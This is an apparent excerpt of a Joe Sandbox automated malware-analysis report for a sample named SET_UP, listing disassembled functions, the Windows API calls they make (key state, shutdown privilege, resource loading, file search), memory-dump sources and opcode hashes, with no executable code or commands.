                                                                                                                                                                                                  Function 004BCB4B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160keyboardtimeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00431D6C: GetParent.USER32(?), ref: 00431D76
                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004BCBD5
                                                                                                                                                                                                  • GetKeyState.USER32(00000001), ref: 004BCC32
                                                                                                                                                                                                  • GetKeyState.USER32(00000001), ref: 004BCC84
                                                                                                                                                                                                  • GetKeyState.USER32(00000001), ref: 004BCCBA
                                                                                                                                                                                                  • KillTimer.USER32(?,0000E001), ref: 004BCCDF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: State$ClientKillParentScreenTimer
                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                  • API String ID: 2757461879-3887548279
                                                                                                                                                                                                  • Opcode ID: be938f7f6e81982a6cd687f9d3054f58a887cfe49e68c227d03ebd911450df42
                                                                                                                                                                                                  • Instruction ID: ee73bc5dc220f15731f4cd434d2c0ff70ae30208cfcda09ece6814647d33f380
                                                                                                                                                                                                  • Opcode Fuzzy Hash: be938f7f6e81982a6cd687f9d3054f58a887cfe49e68c227d03ebd911450df42
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6451BE35A00205DFDF209F99C8C9BEE7FB1AF58314F10046BE419A72D1C7799981CB69
                                                                                                                                                                                                  Function 0041D56A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39shutdownCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041D57C
                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0041D583
                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041D597
                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041D5B6
                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 0041D5C4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                  • API String ID: 1314775590-3733053543
                                                                                                                                                                                                  • Opcode ID: 47321aa7752040917e2e2db6574ec68361b85e0bad87c551a54c0c168b1cdfb9
                                                                                                                                                                                                  • Instruction ID: cd9c67435ba51d4f293e9364d24854e77aa97465d4f2a52b3b4f6194601ac37c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47321aa7752040917e2e2db6574ec68361b85e0bad87c551a54c0c168b1cdfb9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84F037B1901129BBDB10ABA2DD0CEEF7EBCEF05744F100065F905E2151D7749B44CBA9
                                                                                                                                                                                                  Function 00495BF2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: TLK
                                                                                                                                                                                                  • API String ID: 0-691455855
                                                                                                                                                                                                  • Opcode ID: 72299d42923f559e7bf2da4e87230d0e64c44de85820520eb25f53adf5de2d4c
                                                                                                                                                                                                  • Instruction ID: 9c0f4c6780fcd5cbc0c5c4ff472857b190525ed82c8705d2072ab71f2fb27165
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72299d42923f559e7bf2da4e87230d0e64c44de85820520eb25f53adf5de2d4c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEF04F3110464DABCF036FA1CD08AAE3FB8AF04344F248032F906D5160EB39DA56EB5A
                                                                                                                                                                                                  Function 00449E8E Relevance: 6.3, APIs: 4, Instructions: 271COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5f78daad42caf713cc074343fdb3ae219e24cd5723981301c75ef80854d8089b
                                                                                                                                                                                                  • Instruction ID: 71aa9ba6d2822fce9c93e48592105f1161e2e03d17dd82bfb95b9ff2539b45b0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f78daad42caf713cc074343fdb3ae219e24cd5723981301c75ef80854d8089b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7B135B160C382CBD309DF11D09425BBFE1FBC9344F518E5EE4C692265E7348A698B8B
                                                                                                                                                                                                  Function 004080EC Relevance: 6.1, APIs: 4, Instructions: 54keyboardwindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00408114
                                                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0040812F
                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 0040813B
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000111,0000800E,00000000), ref: 0040816D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: State$MessageParentPost
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3389659062-0
                                                                                                                                                                                                  • Opcode ID: 5de91a338267ed57d62910bfaa1db84a37d93785dee4ec1d9cd341ff2d44b484
                                                                                                                                                                                                  • Instruction ID: 10efcba8e10da501b469e1274d0fc4ad6cc4ced9e6653cde3d127f9ef6c09f72
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de91a338267ed57d62910bfaa1db84a37d93785dee4ec1d9cd341ff2d44b484
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7401F136310205AEEB146B759D46FAA3268AF24364F04087FF241BB2E1CFB898469719
                                                                                                                                                                                                  Function 004B486B Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004B5633: GetWindowLongW.USER32(?,000000F0), ref: 004B563F
                                                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 004B488F
                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 004B4898
                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 004B48A1
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 004B48B7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: State$LongMessageSendWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1063413437-0
                                                                                                                                                                                                  • Opcode ID: ab31869e94c7246c0db5bc6cd18114ca45597ccb8df6211dfc86f5288c57dc99
                                                                                                                                                                                                  • Instruction ID: fe42ac8c9e3b4bdcbc4ab34818f9803fec0e6c5a31f96b1f8c7c79508b8f5f8e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab31869e94c7246c0db5bc6cd18114ca45597ccb8df6211dfc86f5288c57dc99
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF0A77AF403C525E920369A5C42FE543144FD0BD4F40463FB741BE1D38BD98C0A567A
                                                                                                                                                                                                  Function 004A535D Relevance: 4.7, APIs: 3, Instructions: 207timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0049D76C: InitializeCriticalSection.KERNEL32(00000000,?,00000010,?,00497754,00000009,?,00000000,00000000,004A9913,004A9913), ref: 0049D7A9
                                                                                                                                                                                                    • Part of subcall function 0049D76C: EnterCriticalSection.KERNEL32(00000010,00000010,?,00497754,00000009,?,00000000,00000000,004A9913,004A9913), ref: 0049D7C4
                                                                                                                                                                                                    • Part of subcall function 0049D7CD: LeaveCriticalSection.KERNEL32(?,00497880,00000009,0049786E,00000000,00000010,00000000,?,00497754,00000009,?,00000000), ref: 0049D7DA
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(0000000C,00000000,0000000C,?,0000000B,0000000B,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000,00000001), ref: 004A53AB
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000220,0050B88C,000000FF,0000003F,00000000,00000000,?,0000000B,0000000B,?,004A534E,0049B51F,00000000,?,?,0049B392), ref: 004A5441
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000220,0050B8E0,000000FF,0000003F,00000000,00000000,?,0000000B,0000000B,?,004A534E,0049B51F,00000000,?,?,0049B392), ref: 004A547A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3442286286-0
                                                                                                                                                                                                  • Opcode ID: 6669434559872f4ad5b526729b2d8edc8b5f2fd59622ffa8849d61556b2627b6
                                                                                                                                                                                                  • Instruction ID: d3c7aedec4717d8268afb140bb1496981f6337bd566b95c86885ab7122d5bb65
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6669434559872f4ad5b526729b2d8edc8b5f2fd59622ffa8849d61556b2627b6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3611771804540AEDB259F19AD95F3E3FEAAB26310F14007FE085872A1DB784D8DE75D
                                                                                                                                                                                                  Function 004B4D21 Relevance: 4.5, APIs: 3, Instructions: 32COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,000000F0,?,?,?,004B7122,?,?,0040C691), ref: 004B4D40
                                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,004B7122,?,?,0040C691), ref: 004B4D4C
                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,?,004B7122,?,?,0040C691), ref: 004B4D5B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Resource$FindLoadLock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2752051264-0
                                                                                                                                                                                                  • Opcode ID: 21618571619dc9f32990e146191597804b32edf4eed1346fe7ca77124e62f237
                                                                                                                                                                                                  • Instruction ID: 9fedf7fb1a24132cf3d9c163db703baf7222ef898b5f4c5ef4801a2647b531da
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21618571619dc9f32990e146191597804b32edf4eed1346fe7ca77124e62f237
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEE09B362015116FD7515BA25C48DBFB69DEFD0362714483BF501D3222CB389C01867D
                                                                                                                                                                                                  Function 00448B20 Relevance: 3.9, APIs: 2, Instructions: 871COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __ftol.LIBCMT ref: 00448CC2
                                                                                                                                                                                                  • __ftol.LIBCMT ref: 00448CEF
                                                                                                                                                                                                    • Part of subcall function 0049841C: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0049689D,00000000), ref: 0049844A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __ftol$ExceptionRaise
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 958255650-0
                                                                                                                                                                                                  • Opcode ID: 1c5dbaff3546de016f12f18a2e4a79abd8164f1251e6b68c98441f7506e8ea28
                                                                                                                                                                                                  • Instruction ID: b77e52a34418efc6930abcc8d7bd151964aad73d5a8582161e4a4a3cb68b83f4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c5dbaff3546de016f12f18a2e4a79abd8164f1251e6b68c98441f7506e8ea28
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F62A071A002199FEF14DFA8C895BEEBBB5BF48304F14416EE905AB381DB789C45CB94
                                                                                                                                                                                                  Function 004B8FD2 Relevance: 3.1, APIs: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004B7CBA: __EH_prolog.LIBCMT ref: 004B7CBF
                                                                                                                                                                                                    • Part of subcall function 004B7CBA: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004B7CDD
                                                                                                                                                                                                    • Part of subcall function 004B7CBA: lstrcpynW.KERNEL32(?,?,00000104), ref: 004B7CEC
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?), ref: 004B8FFF
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004B9011
                                                                                                                                                                                                    • Part of subcall function 004B0002: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004B0012
                                                                                                                                                                                                    • Part of subcall function 004B0002: FileTimeToSystemTime.KERNEL32(?,?), ref: 004B0024
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileTime$Find$CloseFirstFullH_prologLocalNamePathSystemlstrcpyn
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1806329094-0
                                                                                                                                                                                                  • Opcode ID: 2ec9aa7cd0ed0458b4a20e03f07730c68ff8b255f05ee04d9bea5dbea6419716
                                                                                                                                                                                                  • Instruction ID: 9e0a7da85598058de2ea5110a098b1696ea9aafbab9683c69dabc9747e422b41
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ec9aa7cd0ed0458b4a20e03f07730c68ff8b255f05ee04d9bea5dbea6419716
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1216D72400208AFCB21EF65CC85ADBB7F8FF59310F10496AE586D7251E778AA85CB64
                                                                                                                                                                                                  Function 0043D4B0 Relevance: 2.9, Strings: 2, Instructions: 407COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Decode: Unknown or wrong format, xrefs: 0043D911
                                                                                                                                                                                                  • null file handler, xrefs: 0043D4D9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Decode: Unknown or wrong format$null file handler
                                                                                                                                                                                                  • API String ID: 0-166038648
                                                                                                                                                                                                  • Opcode ID: acc8b7a53dbbd0123d2eaf865458676f59ae11da534f35f33e2560bf137fdd1a
                                                                                                                                                                                                  • Instruction ID: 3bf89804e1bda1bd10fce0bb8abec238fb01d3e232a8b12f2e1c93d31ab88cbf
